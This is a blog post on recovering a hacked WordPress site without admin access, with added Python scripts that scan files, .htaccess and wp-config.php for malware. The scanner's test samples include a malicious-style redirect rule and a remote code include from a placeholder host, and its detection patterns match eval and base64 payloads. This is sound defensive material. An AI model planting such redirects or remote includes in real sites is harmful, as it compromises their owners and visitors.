How to Manage a Hacked WordPress Website When Admin Panel Is Also Not Openable
Posted By: Shriji Solutions
28 June, 2025

WordPress powers over 40% of websites globally, making it a popular target for hackers. Getting hacked can be a nightmare, especially when you can’t even access your WordPress admin dashboard. Whether it’s a defaced homepage, a redirect to malicious websites, or total lockdown from your admin panel, the situation calls for immediate action.
In this blog, we’ll guide you through the steps to manage a hacked WordPress website when the wp-admin panel is also inaccessible.
Don’t Panic: Evaluate the Situation
First things first: breathe. Many website owners have faced this problem, and while it's serious, it's fixable. Begin by identifying the signs of a hack:
- You are redirected to a strange website.
- The homepage is replaced or defaced.
- You get a white screen of death.
- You’re locked out of the admin panel.
- There’s a warning from Google that your site is compromised.
- New, suspicious users appear in your database.
Make note of any such symptoms. Document error messages and take screenshots if necessary. This information will be useful later if you hire a professional.
Contact Your Hosting Provider Immediately
Your hosting provider can be your first line of defense. Good hosts usually maintain access logs, backups, and security tools that can be helpful.
Ask them to:
- Temporarily disable the website to prevent further damage.
- Scan for malware.
- Restore the most recent clean backup if possible.
- Give you access to logs that show unauthorized activities.
If you’re on shared hosting, your host might already be aware of the breach and could be working on a solution. Managed WordPress hosting providers often have specialized support for this kind of situation.
Access Files Through FTP or File Manager
Since you can’t access the WordPress admin panel, you’ll need to go through the backend using FTP (File Transfer Protocol) or your hosting account’s File Manager.
Steps:
- Use an FTP client like FileZilla.
- Enter your FTP credentials (get them from your hosting account).
- Connect and browse to the /public_html/ or root directory of your WordPress site.
Once inside, check for:
- Recently modified files (especially in /wp-content/themes/, /wp-content/plugins/, and root).
- Suspicious files with strange names or extensions like .ico, .php5, .bak, etc.
Do not delete files randomly. Instead, download copies for inspection or to show your web developer.
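The checks above can be run over the downloaded copy instead of by eye. This is an added example, not code from the original post: the function name, the 14-day window and the sample tree are assumptions. It also assumes the download kept the server's modification times.

```python
import os
import tempfile
import time

EXT_ALONE = {".php5", ".bak"}       # flagged on extension alone (from the article)
ICO_MAGIC = b"\x00\x00\x01\x00"     # first four bytes of a genuine .ico image

def triage(root, days=14, now=None):
    """Return sorted (relative_path, reasons) pairs worth inspecting by hand."""
    cutoff = (time.time() if now is None else now) - days * 86400
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            with open(path, "rb") as fh:
                head = fh.read(512)
            reasons = []
            if ext in EXT_ALONE:
                reasons.append("suspect extension")
            if ext == ".ico" and not head.startswith(ICO_MAGIC):
                reasons.append("not a real icon")
            if not ext.startswith(".php") and b"<?php" in head:
                reasons.append("PHP code in non-PHP file")
            if os.path.getmtime(path) >= cutoff:
                reasons.append("recently modified")
            if reasons:
                findings.append((os.path.relpath(path, root), reasons))
    return sorted(findings)

if __name__ == "__main__":
    # Constructed tree standing in for a downloaded copy of the site.
    samples = {"index.php": b"<?php // front controller",
               "favicon.ico": ICO_MAGIC + b"\x01\x00",
               "favicon_ab12.ico": b"<?php /* constructed marker */"}
    with tempfile.TemporaryDirectory() as site:
        old = time.time() - 90 * 86400
        for name, data in samples.items():
            with open(os.path.join(site, name), "wb") as fh:
                fh.write(data)
            os.utime(os.path.join(site, name), (old, old))
        for path, reasons in triage(site):
            print(path, "->", ", ".join(reasons))
```

A genuine favicon passes because of its magic bytes, so only an .ico file that is not an image is reported.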
Check and Clean the .htaccess File
The .htaccess file controls many server-level functions. Hackers often use it to redirect your website to malicious domains.
Steps:
- Locate the .htaccess file in the root directory.
- Download a backup before editing.
- Open the file and look for suspicious redirects or code.
- Replace its content with the default WordPress .htaccess rules.
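To see what differs before replacing the file, the downloaded .htaccess can be compared line by line with the stock rules. This is an added example, not code from the original post: the function name and sample lines are assumptions, and the embedded default is the block WordPress writes for a single-site install at the domain root (a subdirectory install has different RewriteBase and index.php paths).

```python
import re

# Stock rules WordPress writes for a single-site install at the domain root.
DEFAULT_HTACCESS = r"""# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""

# Directives that can send a visitor to another site when given an absolute URL.
EXTERNAL = re.compile(r"(RewriteRule|Redirect(Match)?|ErrorDocument)\b.*https?://", re.I)

def audit_htaccess(text):
    """Return (line_no, reason, line) for every directive that is not stock WordPress."""
    stock = {ln.strip() for ln in DEFAULT_HTACCESS.splitlines()}
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line in stock:
            continue
        if EXTERNAL.match(line):
            findings.append((no, "points at an external URL", line))
        elif not line.startswith("#"):
            findings.append((no, "not in the default file", line))
    return findings

# Constructed sample: the stock block plus two extra lines (placeholder host name).
SAMPLE = DEFAULT_HTACCESS + (
    "RewriteRule ^(.*)$ http://redirect.example.invalid/ [R=302,L]\n"
    "Header set X-Frame-Options SAMEORIGIN\n"
)

if __name__ == "__main__":
    for no, reason, line in audit_htaccess(SAMPLE):
        print(f"line {no}: {reason}: {line}")
```

A "not in the default file" finding is a prompt to review, since caching and security plugins legitimately add their own rules.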
Manually Disable Plugins
Hackers often exploit vulnerabilities in plugins. Since the admin panel is inaccessible, you can disable plugins manually via FTP.
Steps:
- Navigate to /wp-content/.
- Rename the plugins folder to something like plugins-disabled.
This will deactivate all plugins at once. Try accessing your site afterward. If it loads, one of the plugins was likely the cause.
You can then rename the folder back to plugins, and disable plugins one by one by renaming individual plugin folders to identify the culprit.
Scan Files for Malware
You can use malware scanner tools that work via file uploads or server-side scripts. Some popular options:
- Sucuri SiteCheck (browser-based)
- Wordfence CLI (requires server access)
- MalCare Manual Scanner
Also, look for suspicious code patterns such as:
- Base64 encoded text
- Long strings of random characters
- eval() functions in PHP files
If you find suspicious code, isolate it and get professional advice before removing it.
Check the wp-config.php File
The wp-config.php file contains your WordPress database credentials. Hackers sometimes modify this file to inject malicious commands.
Look for:
- Additional code after the ?> PHP closing tag
- Unknown constants or functions
- Suspicious includes or remote file calls
Remove any unfamiliar or malicious-looking code carefully.
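The code patterns listed under "Scan Files for Malware" and the wp-config.php checks above can be applied to downloaded files with one small scanner. This is an added example, not code from the original post: the rule names, the 200-character threshold and both samples are assumptions, and a hit means "read this line", not "this is malware".

```python
import re

# The 200-character threshold for "long random strings" is an assumption; tune it.
RULES = [
    ("eval() call", re.compile(rb"\beval\s*\(", re.I)),
    ("base64 decoding", re.compile(rb"\bbase64_decode\s*\(", re.I)),
    ("long encoded string", re.compile(rb"[A-Za-z0-9+/=]{200,}")),
    ("include of a remote URL",
     re.compile(rb"\b(?:include|require)(?:_once)?\b[^;]*https?://", re.I)),
]

def line_of(source, offset):
    """1-based line number of a byte offset."""
    return source.count(b"\n", 0, offset) + 1

def scan_php(source, is_config=False):
    """Return sorted (line_no, finding) pairs for one PHP file's bytes."""
    hits = {(line_of(source, m.start()), name)
            for name, rx in RULES for m in rx.finditer(source)}
    if is_config:
        # wp-config.php should end at its closing tag (or have none at all).
        close = source.find(b"?>")
        if close != -1 and source[close + 2:].strip():
            hits.add((line_of(source, close), "content after closing ?>"))
    return sorted(hits)

# Constructed samples; the encoded run is just "ABC" repeated, the host a placeholder.
SAMPLE_PLUGIN = (b"<?php\n// constructed sample\n"
                 b"$out = eval(base64_decode('" + b"QUJD" * 60 + b"'));\n")
SAMPLE_CONFIG = (b"<?php\ndefine('DB_NAME', 'wp');\n"
                 b"require_once ABSPATH . 'wp-settings.php';\n?>\n"
                 b"<?php include 'http://cdn.example.invalid/a.txt';\n")

if __name__ == "__main__":
    for label, data, cfg in (("plugin file", SAMPLE_PLUGIN, False),
                             ("wp-config.php", SAMPLE_CONFIG, True)):
        for no, finding in scan_php(data, is_config=cfg):
            print(f"{label} line {no}: {finding}")
```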
Reset File Permissions
Incorrect file permissions can allow unauthorized access. Resetting them can help prevent further issues.
Recommended settings:
- Files: 644
- Directories: 755
- wp-config.php: 600
Use your FTP client or hosting control panel to adjust these permissions.
Change All Passwords and Security Keys
Once you have some control back, change all related passwords:
- Hosting account
- FTP
- WordPress database
- Email accounts linked to the site
Also, update the WordPress Security Keys in wp-config.php using the WordPress key generator. This forces all users to log in again and invalidates any hijacked sessions.
Restore from a Clean Backup
If your host or you have a clean backup from before the hack:
- Download the backup to check it's uncompromised.
- Restore the files and database.
- Change all passwords after the restore.
- Update all plugins, themes, and WordPress core to the latest version.
Make sure the backup itself isn't compromised before restoring.
Reinstall WordPress Core Files
Replace the core files with fresh copies to ensure they haven’t been tampered with.
Steps:
- Download the latest WordPress from WordPress.org.
- Extract the ZIP file.
- Upload only the /wp-admin/ and /wp-includes/ folders via FTP, replacing the existing ones.
- Do not replace wp-content/ or wp-config.php.
This overwrites any hacked core files.
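Before uploading, the downloaded site copy can be compared with the fresh extract to see which core files were changed and which files exist only on the site; an upload that overwrites files does not remove the latter. This is an added example, not code from the original post: the function names and sample trees are assumptions. It also assumes the fresh extract is the same WordPress version as the site, otherwise most files will differ.

```python
import hashlib
import os
import tempfile

CORE_DIRS = ("wp-admin", "wp-includes")   # the two folders the article replaces

def digests(root):
    """Map 'wp-admin/...' style relative paths to SHA-256 hex digests."""
    out = {}
    for core in CORE_DIRS:
        for dirpath, _dirs, files in os.walk(os.path.join(root, core)):
            for name in files:
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    digest = hashlib.sha256(fh.read()).hexdigest()
                out[os.path.relpath(path, root).replace(os.sep, "/")] = digest
    return out

def compare_core(site_copy, clean_release):
    """Diff a downloaded site copy against a fresh extract of the same version."""
    site, clean = digests(site_copy), digests(clean_release)
    return {
        "modified": sorted(p for p in site if p in clean and site[p] != clean[p]),
        "extra": sorted(p for p in site if p not in clean),
        "missing": sorted(p for p in clean if p not in site),
    }

def write_tree(root, files):
    """Helper for the constructed demo: create files from a {path: bytes} map."""
    for rel, data in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)

if __name__ == "__main__":
    # Constructed stand-ins for the fresh extract and the downloaded site copy.
    clean = {"wp-includes/load.php": b"<?php // stock",
             "wp-admin/index.php": b"<?php // stock"}
    site = dict(clean, **{"wp-includes/load.php": b"<?php // stock + injected",
                          "wp-includes/class-wp-tmp.php": b"<?php // unknown file"})
    with tempfile.TemporaryDirectory() as a, tempfile.TemporaryDirectory() as b:
        write_tree(a, site)
        write_tree(b, clean)
        print(compare_core(a, b))
```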
Scan and Clean the Database
Some hacks inject malicious scripts into the database, especially in wp_options, wp_posts, or wp_users tables.
Use tools like:
- phpMyAdmin for manual inspection
- Wordfence Premium or MalCare for automated scanning
Look for JavaScript in post content or suspicious admin accounts.
Notify a Professional Web Developer
If your website is hacked and your admin panel is inaccessible, you should absolutely involve a professional web developer. They can:
- Detect and remove deeply embedded malware
- Review server logs for the root cause
- Secure the site from future attacks
- Prevent unintentional data loss
- Help get your site off Google's blacklist
Trying to fix a hacked website without expertise can sometimes do more harm than good. A certified developer can save you time, money, and future risk.
Conclusion
Dealing with a hacked WordPress site is stressful, especially when you can’t even open your admin panel. From accessing your files via FTP to checking for suspicious code and restoring from backups, every step must be taken with caution. However, the safest and most efficient solution is to contact a professional web developer as soon as possible. Attempting to clean a hacked website without technical expertise may lead to more damage.
If you're facing such a situation and need expert help, Shriji Solutions is here to assist. Our experienced team specializes in WordPress recovery, malware removal, and security hardening. Don’t wait until it’s too late; get your website back in safe hands with Shriji Solutions.